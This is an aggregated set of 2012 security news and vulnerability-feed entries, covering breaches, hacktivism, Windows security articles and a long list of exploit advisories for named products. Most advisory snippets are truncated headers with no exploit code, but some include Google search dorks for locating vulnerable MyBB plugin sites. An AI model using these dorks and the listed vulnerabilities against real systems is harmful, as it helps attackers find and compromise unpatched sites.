http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victims bank account. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Video: Importing Custom Settings Into Group Policy Production using Security Compliance Manager (SCM)

http://rss.windowsecurity.com/ This video explains the process of importing custom settings into Group Policy Production using Security Compliance Manager.

==> Using Virtual Smart Cards with Windows 8

http://rss.windowsecurity.com/ In this article, we'll look at how virtual smart cards are created and used in Windows 8.

==> Checkpoint VPN-1 Power - Voted WindowSecurity.com Readers' Choice Award Winner - VPN Software

http://rss.windowsecurity.com/ Checkpoint VPN-1 Power was selected the winner in the VPN Software category of the WindowSecurity.com Readers' Choice Awards. Celestix MSA Threat Management Gateway Series and Securepoint Security UTM Software were runner-up and second runner-up respectively.

==> Firewall is Enabled and Configured on Windows Server 2008/R2 Domain Controllers

http://rss.windowsecurity.com/ In this article the author reviews Windows Server 2008/R2 Firewall settings and options on Domain Controllers.

==> Video: Importing GPOs into Security Compliance Manager (SCM)

http://rss.windowsecurity.com/ This video explains the process of importing GPOs into Security Compliance Manager 2.5.

==> Tenable Nessus - Voted WindowSecurity.com Readers' Choice Award Winner - Security Scanner Software

http://rss.windowsecurity.com/ Tenable Nessus was selected the winner in the Security Scanner Software category of the WindowSecurity.com Readers' Choice Awards. Acunetix Web Vulnerability Scanner and ManageEngine Security Manager Plus were runner-up and second runner-up respectively.

==> Ghostshell takes credit for extensive hack of government, private websites

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.csoonline.com/article/723577/ghostshell-takes-credit-for-extensive-hack-of-government-private-websites By Antone Gonsalves CSO December 11, 2012 The hacktivist group Team Ghostshell took credit Monday for the release of 1.6 million accounts and records stolen from government and private organizations covering aerospace, law enforcement, the military, the defense industry and banking. Among the organizations the group claimed to...

==> Email intruder causes N.C. hospital data breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.clinical-innovation.com/topics/privacy-security/email-intruder-causes-nc-hospital-data-breach By Beth Walsh Clinical-Innovation.com Dec 11, 2012 Approximately 5,600 patients of Carolinas Medical Center-Randolph are impacted by a data breach caused by an unauthorized electronic intruder who obtained incoming and outgoing emails from a provider's account without the provider's or the hospital's knowledge. The...

==> New Cyberespionage Attack Targets Russia

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240144243/new-cyberespionage-attack-targets-russia.html By Kelly Jackson Higgins Dark Reading Dec 11, 2012 China is often considered synonymous with cyberespionage, but what about Korea? A new targeted attack campaign with apparent Korean ties has been stealing email and Facebook credentials and other user-profile information from Russian telecommunications, IT,...

==> How much crime really occurs? Don’t ask t he feds.

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.nextgov.com/big-data/2012/12/how-much-crime-really-occurs-dont-ask-feds/60084/ By Aliya Sternstein Nextgov December 11, 2012 The United States has no accounting of how much crime there really is nationwide because FBI statistics do not reflect cybercrimes and other offenses that have cropped up since reporting began in 1930. But that might change in 2013. Millions victimized by fraud and online crimes, but this is often not...

==> Anon on the run: How Commander X jumped bail and fled to Canada

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://arstechnica.com/tech-policy/2012/12/anon-on-the-run-how-commander-x-jumped-bai/ By Nate Anderson Ars Technica Dec 11 2012 "You scared?" asks the fugitive in the camouflage pants as he sidles up to our pre-arranged meeting point in a small Canadian park. He wears sunglasses to hide his eyes and a broad-brimmed hat to hide his face. He scans the park perimeter for police. "Cuz I'm scared enough for both of us."...

==> BlackBerry’s blacklist: 106 passwords you can't use

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://gcn.com/blogs/cybereye/2012/12/blackberry-blacklist-106-passwords-you-cant-use.aspx By William Jackson Cybereye GCN.com Dec 07, 2012 Research In Motions long-awaited new mobile OS, the BlackBerry 10, contains a blacklist of 106 verboten passwords that users will not be able to use to secure access to their devices, researchers have found. The new OS is expected to be released Jan. 30 and is part of a major effort by RIM to regain...

==> Anonymous member claims massive ADFA hack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.abc.net.au/news/2012-12-11/adfa-hack/4421690 ABC.net.au December 11, 2012 The private details of thousands of staff and students at the Australian Defence Force Academy (ADFA) have been hacked and released online. The details include the name, rank, birth dates and passwords of up to 20,000 people. A member of the infamous Anonymous group, known as Darwinaire, is claiming responsibility for the theft. An online blog for hackers...

==> Tor network used to command Skynet botnet

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://news.techworld.com/security/3415592/tor-network-used-command-skynet-botnet/ By Lucian Constantin Techworld.com 10 December 2012 Security researchers have identified a botnet controlled by its creators over the Tor anonymity network. It's likely that other botnet operators will adopt this approach, according to the team from vulnerability assessment and penetration testing firm Rapid7. The botnet is called Skynet and can be used...

==> 25-GPU cluster cracks every standard Windows password in <6 hours

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/ By Dan Goodin Ars Technica Dec 9 2012 A password-cracking expert has unveiled a computer cluster that can cycle through as many as 350 billion guesses per second. It's an almost unprecedented speed that can try every possible Windows passcode in the typical enterprise in less than six hours. The five-server system uses a relatively...

==> Pakistan Cyber Army declares war on Chinese, Bangladeshi sites

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.theregister.co.uk/2012/12/10/pakistan_cyber_army_hack_bangladesh_china/ By Phil Muncaster The Register 10th December 2012 Hacktivists claiming to hail from the Pakistan Cyber Army have defaced over 400 Chinese government web sites and also hit in excess of 20 Bangladeshi government sites. A hacker known as Code Cracker is claiming responsibility for the attack on the official web site of Xuchang City Peoples...

==> Swiss Warning Intelligence Partners About Massive Data Breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.securitymanagement.com/news/swiss-warning-intelligence-partners-about-massive-data-breach-0011219 By Carlton Purvis securitymanagement.com 12/06/2012 It's a real life version of Office Space except with national security implications. Swiss intelligence is warning the U.S. and Britain that counterterrorism information may have been leaked after a disgruntled employee stole a large amount of sensitive data, Reuters reported...

==> Aramco Says Cyberattack Was Aimed at Production

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.nytimes.com/2012/12/10/business/global/saudi-aramco-says-hackers-took-aim-at-its-production.html By REUTERS December 9, 2012 JEDDAH, Saudi Arabia -- Saudi Arabias national oil company, Aramco, said on Sunday that a cyberattack against it in August that damaged some 30,000 computers was aimed at stopping oil and gas production in Saudi Arabia, the biggest exporter in the Organization of the Petroleum Exporting Countries. The...

==> Russian hackers break into Australian medical clinic’s patient records, demand $4,000 ran som

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://thenextweb.com/au/2012/12/10/australian-medical-practice-patient-database-held-to-ransom-by-russian-hackers/ By Joel Falconer The Next Web 10 Dec '12 A Gold Coast, Australia medical practice has been held to ransom by a group of Russian hackers. The hackers encrypted the practices patient database, rendering it unusable until decrypted. The hackers have asked for the fairly low sum of $4,000, ABC News reports, noting that...

==> CanSecWest13 CFP Open Until December 14 2012, Conf March 7-9 2013, Vancouver

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 07 Forwarded from: Dragos Ruiu <dr (at) kyx.net> The CFP is open and a new conference rushes forward. The shorter version: Package up your PII/contact info that we need so we can book flights and figure out visas, put together a summary of who you are and what you want to talk about that is cool new security research, and email them to our jaded, grumpy reviewers (some of whom still use mutt so make sure you...

==> Submarine expert arrested after 'attempting to hand over Navy's secrets to FBI agents posing as Russian spies'

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 07 http://www.dailymail.co.uk/news/article-2244374/Submarine-expert-arrested-attempting-hand-Navys-secrets-FBI-agents-posing-Russian-spies.html By Daily Mail Reporter 6 December 2012 Former U.S. Navy submarine warfare specialist Robert Patrick Hoffman II was arrested Thursday morning on charges of turning over classified information to undercover FBI agents posing as representatives of the Russian Federation. Hoffman, 39, of Virginia,...

==> Snare For Linux Cross Site Request Forgery

http://securityreason.com/rss/SecurityAlert Topic: Snare For Linux Cross Site Request Forgery Risk: Low Text:Snare for Linux Cross-Site Request Forgery I. BACKGROUND - Snare for Linux provides a 'C2' or 'CAPP' style audit ...

==> Snare For Linux Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: Snare For Linux Cross Site Scripting Risk: Low Text:Snare for Linux Cross-Site Scripting via Log Injection I. BACKGROUND - Snare for Linux provides a 'C2' or 'CAPP' ...

==> SimpleInvoices 2011.1 Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: SimpleInvoices 2011.1 Cross Site Scripting Risk: Low Text:Overview SimpleInvoices 2011.1 is vulnerable to Cross-site Scripting (XSS). Software Description Simple Invoices is a fr...

==> gpEasy CMS XSS Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: gpEasy CMS XSS Vulnerability Risk: Low Text:1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ ...

==> Axway Directory Traversal

http://securityreason.com/rss/SecurityAlert Topic: Axway Directory Traversal Risk: Medium Text:Secure Transport Path Traversal Vulnerability Public Disclosure Date: November 11, 2012 Vendors Affected: Axway http:/...

==> HP Data Protector DtbClsLogin Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: HP Data Protector DtbClsLogin Buffer Overflow Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> MyBB Profile Blog plugin multiple vulnerabilitie

http://securityreason.com/rss/SecurityAlert Topic: MyBB Profile Blog plugin multiple vulnerabilitie Risk: Medium Text:# Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities. # Google Dork: inurl:member.php intext:"Profile Blogs" for...

==> MyBB plugin Bank v3 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: MyBB plugin Bank v3 SQL Injection Risk: Medium Text:# Exploit Title: MyBB plugin SQLi 0day # Exploit Author: Red_Hat [NullSec] # Software Link: http://mods.mybb.com/download/ba...

==> Joomla Jooproperty SQL Injection &Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: Joomla Jooproperty SQL Injection &Cross Site Scripting Risk: Medium Text: 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __...

==> Nagios Core 3.4.3 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: Nagios Core 3.4.3 Buffer Overflow Risk: High Text:history.cgi is vulnerable to a buffer overflow due to the use of sprintf with user supplied data that has not been restricted ...

==> Android Kernel 2.6 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: Android Kernel 2.6 Denial Of Service Risk: Medium Text:# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3...

==> MyBB Kingchat Cross Site Scripting

http://securityreason.com/rss/SecurityAlert Topic: MyBB Kingchat Cross Site Scripting Risk: Low Text:Exploit Title: MyBB 'kingchat' chat-box plugin. Google Dork: inurl:/kingchat.php? Date: 8/12/12 Author: VipVince Vendor Hom...

==> DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira

==> FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: FreeVimager 4.1.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira ...

==> Dolphin3D web browser ActiveX Remote Command Execution

http://securityreason.com/rss/SecurityAlert Topic: Dolphin3D web browser ActiveX Remote Command Execution Risk: High Text:## # # Dolphin3D web browser ActiveX Remote Command Execution # # Date: Dez 9 2012 # Author: Rh0 # Affected Version: Dolp...

==> FreeFloat FTP Server Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: FreeFloat FTP Server Buffer Overflow Risk: High Text:#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow #Date: 06/12/2012 #Exploit Author:...

==> Cisco DPC2420 Cross Site Scripting & File Disclosure

http://securityreason.com/rss/SecurityAlert Topic: Cisco DPC2420 Cross Site Scripting & File Disclosure Risk: High Text:## ## -> Title: DPC2420 Multiple vulnerabilities ## -> Author: Facundo M. de la Cruz (tty0) ## -> E-mail: fmdlc@code4life.c...

==> Havalite 1.1.7 Cross Site Scripting & Shell Upload

http://securityreason.com/rss/SecurityAlert Topic: Havalite 1.1.7 Cross Site Scripting & Shell Upload Risk: High Text:# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ _...

==> Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability Risk: High Text:: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability : # Date : 08 Desember 2012 : # Aut...

==> Pixie v1.04 blog Add Admin

http://securityreason.com/rss/SecurityAlert Topic: Pixie v1.04 blog Add Admin Risk: High Text: Pixie v1.04 blog Add Admin ## # Vendor : http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # ...

==> KeenLook SQL injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: KeenLook SQL injection Vulnerability Risk: Medium Text:# Exploit Title: KeenLook sql injection Vulnerability # Date: 05/10/2012 # Author: The Black Devils # Home: 1337day Exploit...

==> Centrify Deployment Manager v2.1.0.283 Local Root

http://securityreason.com/rss/SecurityAlert Topic: Centrify Deployment Manager v2.1.0.283 Local Root Risk: High Text:Centrify Deployment Manager v2.1.0.283 local root 12/7/2012 Taking a little longer look at the software, I managed to win a...

==> Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling

http://securityreason.com/rss/SecurityAlert Topic: Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling Risk: High Text:Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in /tmp. I...

==> TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: TVMOBiLi Media Server 2.1.0.3557 Denial Of Service Risk: Medium Text:Advisory ID: HTB23120 Product: TVMOBiLi media server Vendor: TVMOBiLi Vulnerable Version(s): 2.1.0.3557 and probably prior v...

==> Achievo 1.4.5 Cross Site Scripting & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Achievo 1.4.5 Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23126 Product: Achievo Vendor: www.achievo.org Vulnerable Version(s): 1.4.5 and probably prior Tested Versi...

==> Splunk 5.0 Custom App Remote Code Execution

http://securityreason.com/rss/SecurityAlert Topic: Splunk 5.0 Custom App Remote Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> WordPress Simple Gmail Login Path Disclosure

http://securityreason.com/rss/SecurityAlert Topic: WordPress Simple Gmail Login Path Disclosure Risk: Low Text: # Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace Error URL- http://wordpress.org/extend/plugins...

==> ClipBucket 2.6 Revision 738 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ClipBucket 2.6 Revision 738 SQL Injection Risk: Medium Text:Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com Vulnerable Version(s): 2.6 Revision 738 and probably prior...

==> FreeFloat FTP Server Arbitrary File Upload

http://securityreason.com/rss/SecurityAlert Topic: FreeFloat FTP Server Arbitrary File Upload Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> Maxthon3 about:history XCS Trusted Zone Code Execution

http://securityreason.com/rss/SecurityAlert Topic: Maxthon3 about:history XCS Trusted Zone Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> VLC Media Player 2.0.4 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: VLC Media Player 2.0.4 Buffer Overflow Risk: High Text:Title : VLC media player 2.0.4 buffer overflow POC Version : 2.0.4 Twoflower Date : 2012-12-06 Vendor : http:/...

==> Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability Risk: Medium Text:# Exploit Title: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability # Date: 12/05/2012 # Exploit Author: Woody Hughes

==> IBM System Director Agent DLL Injection

http://securityreason.com/rss/SecurityAlert Topic: IBM System Director Agent DLL Injection Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> m0n0wall 1.33 Cross Site Request Forgery

http://securityreason.com/rss/SecurityAlert Topic: m0n0wall 1.33 Cross Site Request Forgery Risk: Low Text: # # Exploit Title: m0n0wall 1.33 CSRF Remote root Access # Date: 30/11/2012 # Author: Yann CAM @ Synetis # Vendor or Sof...

==> Maxthon / Avant Browser XCS / Same Origin Bypass

http://securityreason.com/rss/SecurityAlert Topic: Maxthon / Avant Browser XCS / Same Origin Bypass Risk: Medium Text:Hi, Below you can find a short summary of discovered vulnerabilities in Maxthon and Avant browsers. Such vulnerabilities w...

==> Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> NVIDIA Install Application 2.1002.85.551 Buffer Overflow

http://securityreason.com/rss/SecurityAlert Topic: NVIDIA Install Application 2.1002.85.551 Buffer Overflow Risk: High Text:

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technological-intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> gobofilter buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow on base64 parsing. Applications: bogofilter 1.2 (12.12.2012)

==> Maxthon and Avant browsers multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Crossite scripting, information leakage, code execution. (12.12.2012)

==> Linux kernel IPv6 filterin bypass

http://securityvulns.com/informer/rss.asp?l=EN It's possible to bypass filtering with overlapping fragments. Applications: kernel 2.6 (12.12.2012)

==> HP OpenVMS DoS

http://securityvulns.com/informer/rss.asp?l=EN DoS via LOGIN and ACME_LOGIN Applications: OpenVMS 8.4 (12.12.2012)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Applications: Smartphone Pentest Framework 0.1, SimpleInvoices 2011.1 (11.12.2012)

==> DIMIN Viewer memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing. Applications: DIMIN Viewer 5.4 (11.12.2012)

==> Contaware FreeVimager memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing. Applications: FreeVimager 4.1 (11.12.2012)

==> Centrify Deployment Manager symbolic links vulnerability, updated since 09.12.2012

http://securityvulns.com/informer/rss.asp?l=EN Insecure temporary files creation. Applications: Centrify Deployment Manager 2.1 (11.12.2012)

==> GNU GIMP memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on XWD files parsing. Applications: gimp 2.8 (11.12.2012)

==> Snare multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Information leakage, CSRF, XSS. Applications: snare 1.6 (11.12.2012)

==> FortiGate FortiWeb crossite scripting

http://securityvulns.com/informer/rss.asp?l=EN Few crossite scripting vulnerabilities. Applications: FortiWeb 4000C, FortiWeb 3000C, FortiWeb 1000C, FortiWeb 400C (10.12.2012)

==> FortiGate FortiDB crossite scripting

http://securityvulns.com/informer/rss.asp?l=EN Few crossite scripting vulnerabilities. Applications: FortiDB 2000B, FortiDB 1000C, FortiDB 400B (10.12.2012)

==> RIM BlackBerry PlayBook information leakage

http://securityvulns.com/informer/rss.asp?l=EN Local HTML file can send any data outside. (10.12.2012)

==> RSA NetWitness Informer multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Web interface multiple vulnerabilities. Applications: RSA NetWitness Informer 2.0 (10.12.2012)

==> OpenStack security vulnerabilities, updated since 29.10.2012

http://securityvulns.com/informer/rss.asp?l=EN User authorization vulnerabilities. (10.12.2012)

==> Forescout NAC multiple security vulnerabilities, updated since 03.12.2012

http://securityvulns.com/informer/rss.asp?l=EN Crossite scripting, protection bypass. Applications: Forescout NAC 6.3 (10.12.2012)

==> Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

http://securityvulns.com/informer/rss.asp?l=EN PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Applications: Squiz CMS 11654, SysAid Helpdesk 8.5, MODx 1.0, Achievo 1.4, ClipBucket, tinymcpuk 0.3, Manage Engine Exchange Reporter 4.1, Wordpress Facebook Survey 1, ManageEngine ServiceDesk 8.0, Simple Slider 1.0, dotProject 2.1, BugTracker.Net 3.5, Video Lead Form 0.5, SilverStripe CMS 3.0 (10.12.2012)

==> python keyring weak cryptography

http://securityvulns.com/informer/rss.asp?l=EN Insecure cipher initializaton (09.12.2012)

==> SonicWALL Continues Data Protection multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Multiple web interface vulnerabilities. Applications: Continues Data Protection 5040 (09.12.2012)

==> splunk DoS

http://securityvulns.com/informer/rss.asp?l=EN Crash on malcrafted packet. Applications: Splunk 4.3 (09.12.2012)

==> HP Integrated Lights-Out information leakage

http://securityvulns.com/informer/rss.asp?l=EN Applications: iLO3, iLO4 (09.12.2012)

==> TVMOBiLi media server buffer overflow

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflow while processing TCP/30888 GET request, multiple DoS conditions. Applications: TVMOBiLi media server 2.1 (09.12.2012)

==> Nagios XI security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Commands injection, SQL injection. Applications: Nagios XI Network Monitor 2011 1.9 (09.12.2012)

==> IBM Director code execution

http://securityvulns.com/informer/rss.asp?l=EN It's possible to load DLL from any location. Applications: IBM Director 5.20 (09.12.2012)

==> FreeSSHD / FreeFTPD authentication bypass

http://securityvulns.com/informer/rss.asp?l=EN Authentication results are not checked then client starts ssh session. Applications: FreeSSHD 2.1, FreeFTPD 2.3 (09.12.2012)

==> F5 FirePass SSL VPN information leakage

http://securityvulns.com/informer/rss.asp?l=EN CitrixAuth.php local files inclusion. Applications: FirePass SSL VPN 7.0 (09.12.2012)

==> HP LaserJet printers crossite scripting

http://securityvulns.com/informer/rss.asp?l=EN Applications: Color LaserJet CP3525, LaserJet P3015, Color LaserJet CM3530, Color LaserJet CM6030, Color LaserJet CM6040, Color LaserJet CP4025, Color LaserJet CP4525, Color LaserJet CP6015, LaserJet P4014, LaserJet P4015, LaserJet P4515 (09.12.2012)

==> HP LaserJet Pro 400 MFP unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN Applications: LaserJet Pro 400 (09.12.2012)

==> HP Intelligent Management Center User Access Manager unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN uam.exe buffer overflow Applications: HP Intelligent Management Center 5.1 (09.12.2012)

==> HP Network Node Manager I unauthorized access

http://securityvulns.com/informer/rss.asp?l=EN Applications: Network Node Manager i 9.20 (09.12.2012)

==> xen multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Multiple DoS conditions. Applications: xen 4.1 (09.12.2012)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09). 2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption. 3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3. 4. The general principles of Information-centric/Data Security. 5. Data Verification Issues. 6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years. 7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C. 8. We believe that two existing technologies are evolving into the “core” of data security-Data Loss Prevention and Database Activity Monitoring. The are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect. 10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic,and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet). 11. Related to data classification, here is a post on Information Governance. 12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure. 13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how are files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor. General Coverage ------------ 1. Sorry, Data Labeling is Not the Same as 